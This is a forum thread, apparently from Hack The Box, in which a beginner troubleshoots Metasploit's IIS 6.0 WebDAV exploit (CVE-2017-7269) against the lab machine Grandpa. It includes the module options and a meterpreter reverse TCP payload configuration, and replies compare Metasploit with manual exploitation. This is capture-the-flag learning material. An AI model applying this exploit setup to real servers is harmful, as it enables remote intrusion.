Grandpa - Reverseshell in metasploit not working despite writeups

Hi people.

I’m new to htb so apologies in advance for wrongful usage of tools or terms, I am here to learn.
I attempted to get into grandpa and discovered the IIS 6.0 vulnerability in CVE-2017-7269, however despite many writeups featuring the windows/iis/iis_webdav_scstoragepathfromurl exploit, I’ve been unable to get a shell on the machine.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

Name Current Setting Required Description


MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 10.10.10.14 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description


EXITFUNC process yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name


0 Microsoft Windows Server 2003 R2 SP2 x86

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit

[] Started reverse TCP handler on 10.10.14.5:4444
[
] Trying path length 3 to 60 …
[*] Exploit completed, but no session was created.

I’m running a Parrot Sec Mate with metasploit 6.0.2-0parrot1. I attempted the same thing on a Kali VM and got the same error.

Any help or hints would be much appreciated.
Thanks in advance!

MSF is very hit or miss. I’d suggest trying the manual version of the exploit and seeing if that works.

Type your comment> @sparkla said:

Type your comment> @LMAY75 said:

MSF is very hit or miss. I’d suggest trying the manual version of the exploit and seeing if that works.

When I started I felt the same. But after a while I found MSF is way more reliable and easier than this code-surprise that drops out of exploitdb. More often than not you can get MSF working while the manual way needs 1h of code digging or doesn’t work at all. I even started adding my own exploits. MSF is a go-to tool and with great conveinence options like brute forcing or post-exploitation. Rapid7 guys made a pure genius toolkit there and standardisation is needed in sec.

There is a difference between taking code from exploitdb and doing a manual exploit. Manually involves going through each step by hand or custom writing the code yourself. Msf is prone to weird glitches here and there so i always try it, but often come up disappointed. You are absolutely right that exploitdb has some god awful code tho ■■■■.

Type your comment> @sparkla said:

Without knowing anything about this machine from the top of my head I’d suggest to try different payloads cause that’s a common cause for MSF errors. Also check out non-metasploit writeups, that might give you additional hints what’s supposed to happen in the first place.

Thanks for the help, I was looking through some of the different payloads unfortunately that’s not what fixed the issue, but the tip was well received and now I can use this for when msf doesn’t want to be cooperative in the future, thanks!

@LMAY75 said:
MSF is very hit or miss. I’d suggest trying the manual version of the exploit and seeing if that works.

I attempted to use windows/remote/41738.py which had been referenced in a couple of writeups, and while it unfortunately didn’t work it did lead me down a gardenpath of research I can use in the future, thanks for the tip!

As for my solution, I switched over from my mobile parrot machine and tested a VM using the same setup, and that worked, however it appears the exploit is very temperamental. Similarly I attempted to do it again on that very same troublesome machine this morning and it worked again. My best guess is the issue was caused by me messing up somewhere along the lines, cause now it works with the exact same variables as mentioned above.

Thanks to everyone who partitioned and gave me tip and tricks on how to solve this.

@TheAngryBadger

If you’re in the starting phase of InfoSec, I suggest you to do Manual exploitation.
MSF is just for time saving and not for learning. Avoid MSF as much as possible, try to do it manually to understand every parts. :slight_smile:

Reference above.

Type your comment> @gunroot said:

@TheAngryBadger

If you’re in the starting phase of InfoSec, I suggest you to do Manual exploitation.
MSF is just for time saving and not for learning. Avoid MSF as much as possible, try to do it manually to understand every parts. :slight_smile:

HTB: Walkthrough without Metasploit. ~[GRANDPA] | by Akash Pawar | Medium

Reference above.

Thanks for the tip! I’ll use manual exploitation to learn in the future :slight_smile: